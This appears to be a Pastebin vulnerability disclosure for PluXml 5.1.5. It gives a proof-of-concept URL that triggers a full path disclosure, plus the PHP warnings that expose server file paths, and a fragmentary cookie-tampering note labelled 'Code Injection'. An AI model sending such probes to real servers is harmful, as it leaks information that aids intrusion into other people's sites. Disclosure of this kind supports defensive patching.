Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [+] Author Mick_
- [+]#Date 4/12/18
- [+]#Vulnerabilty Full Path Dislosure
- [+]#Pluxml 5.1.5
- ------------------------------------
- [+]#PoC:
- http://127.0.0.1/pluxml/core/admin/article.php?a=FPD
- Warning: preg_match() expects parameter 2 to be string, array given in C:\wamp\www\pluxml\core\admin\article.php on line 20
- Warning: Cannot modify header information - headers already sent by (output started at C:\wamp\www\pluxml\core\admin\article.php:20) in C:\wamp\www\pluxml\core\admin\article.php on line 22
- Code Injection:
- //setcookie();
- Warning: session_start() [function.session-start]:
- The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\wamp\www\pluxml\core\admin\prepend.php on line 28
- Warning: session_start() [function.session-start]:
- Cannot send session cookie - headers already sent by (output started at C:\wamp\www\pluxml\core\admin\prepend.php:28) in C:\wamp\www\pluxml\core\admin\prepend.php on line 28
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement